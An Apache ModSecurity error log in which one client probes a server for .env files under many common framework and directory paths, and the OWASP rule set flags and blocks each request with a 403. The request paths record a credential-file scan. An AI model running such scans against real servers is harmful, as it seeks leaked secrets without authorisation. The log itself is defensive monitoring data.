[Mon May 11 18:06:51.390953 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-m4W8yzYoWG_eyCW6kAAAAUg"]
[Mon May 11 18:06:51.715811 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/public_html/.env"] [unique_id "agH-m4W8yzYoWG_eyCW6kQAAAUg"]
[Mon May 11 18:06:51.716039 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/public_html/.env"] [unique_id "agH-m4W8yzYoWG_eyCW6kQAAAUg"]
[Mon May 11 18:06:51.716363 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-m4W8yzYoWG_eyCW6kQAAAUg"]
[Mon May 11 18:06:52.101643 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/htdocs/.env"] [unique_id "agH-nIW8yzYoWG_eyCW6kgAAAUg"]
[Mon May 11 18:06:52.101876 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/htdocs/.env"] [unique_id "agH-nIW8yzYoWG_eyCW6kgAAAUg"]
[Mon May 11 18:06:52.102201 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-nIW8yzYoWG_eyCW6kgAAAUg"]
[Mon May 11 18:06:52.399078 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/www/.env"] [unique_id "agH-nIW8yzYoWG_eyCW6lAAAAUg"]
[Mon May 11 18:06:52.399444 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/www/.env"] [unique_id "agH-nIW8yzYoWG_eyCW6lAAAAUg"]
[Mon May 11 18:06:52.399853 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-nIW8yzYoWG_eyCW6lAAAAUg"]
[Mon May 11 18:06:52.509975 2026] [security2:error] [pid 1411055:tid 1411065] [client 43.135.182.95:33468] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agH-nEWKUxpmnkK7zHyj4wAAAQg"]
[Mon May 11 18:06:52.655337 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/html/.env"] [unique_id "agH-nIW8yzYoWG_eyCW6lQAAAUg"]
[Mon May 11 18:06:52.655558 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/html/.env"] [unique_id "agH-nIW8yzYoWG_eyCW6lQAAAUg"]
[Mon May 11 18:06:52.655923 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-nIW8yzYoWG_eyCW6lQAAAUg"]
[Mon May 11 18:06:52.908320 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/live/.env"] [unique_id "agH-nIW8yzYoWG_eyCW6mgAAAUg"]
[Mon May 11 18:06:52.908566 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/live/.env"] [unique_id "agH-nIW8yzYoWG_eyCW6mgAAAUg"]
[Mon May 11 18:06:52.908958 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-nIW8yzYoWG_eyCW6mgAAAUg"]
[Mon May 11 18:06:53.368642 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/prod/.env"] [unique_id "agH-nYW8yzYoWG_eyCW6nQAAAUg"]
[Mon May 11 18:06:53.368874 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/prod/.env"] [unique_id "agH-nYW8yzYoWG_eyCW6nQAAAUg"]
[Mon May 11 18:06:53.369652 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-nYW8yzYoWG_eyCW6nQAAAUg"]
[Mon May 11 18:06:54.046871 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agH-noW8yzYoWG_eyCW6nwAAAUg"]
[Mon May 11 18:06:54.047060 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agH-noW8yzYoWG_eyCW6nwAAAUg"]
[Mon May 11 18:06:54.048709 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-noW8yzYoWG_eyCW6nwAAAUg"]
[Mon May 11 18:06:54.506699 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/staging/.env"] [unique_id "agH-noW8yzYoWG_eyCW6pQAAAUg"]
[Mon May 11 18:06:54.506934 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/staging/.env"] [unique_id "agH-noW8yzYoWG_eyCW6pQAAAUg"]
[Mon May 11 18:06:54.507253 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-noW8yzYoWG_eyCW6pQAAAUg"]
[Mon May 11 18:06:54.789894 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/opt/.env"] [unique_id "agH-noW8yzYoWG_eyCW6pgAAAUg"]
[Mon May 11 18:06:54.790119 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/opt/.env"] [unique_id "agH-noW8yzYoWG_eyCW6pgAAAUg"]
[Mon May 11 18:06:54.790422 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-noW8yzYoWG_eyCW6pgAAAUg"]
[Mon May 11 18:06:55.212124 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agH-n4W8yzYoWG_eyCW6pwAAAUg"]
[Mon May 11 18:06:55.212451 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agH-n4W8yzYoWG_eyCW6pwAAAUg"]
[Mon May 11 18:06:55.212955 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-n4W8yzYoWG_eyCW6pwAAAUg"]
[Mon May 11 18:06:55.485814 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/symfony/.env"] [unique_id "agH-n4W8yzYoWG_eyCW6qQAAAUg"]
[Mon May 11 18:06:55.486030 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/symfony/.env"] [unique_id "agH-n4W8yzYoWG_eyCW6qQAAAUg"]
[Mon May 11 18:06:55.486330 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-n4W8yzYoWG_eyCW6qQAAAUg"]
[Mon May 11 18:06:55.765264 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wordpress/.env"] [unique_id "agH-n4W8yzYoWG_eyCW6qwAAAUg"]
[Mon May 11 18:06:55.765494 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wordpress/.env"] [unique_id "agH-n4W8yzYoWG_eyCW6qwAAAUg"]
[Mon May 11 18:06:55.765770 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-n4W8yzYoWG_eyCW6qwAAAUg"]
[Mon May 11 18:06:56.033239 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/wp/.env"] [unique_id "agH-oIW8yzYoWG_eyCW6rAAAAUg"]
[Mon May 11 18:06:56.033465 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/wp/.env"] [unique_id "agH-oIW8yzYoWG_eyCW6rAAAAUg"]
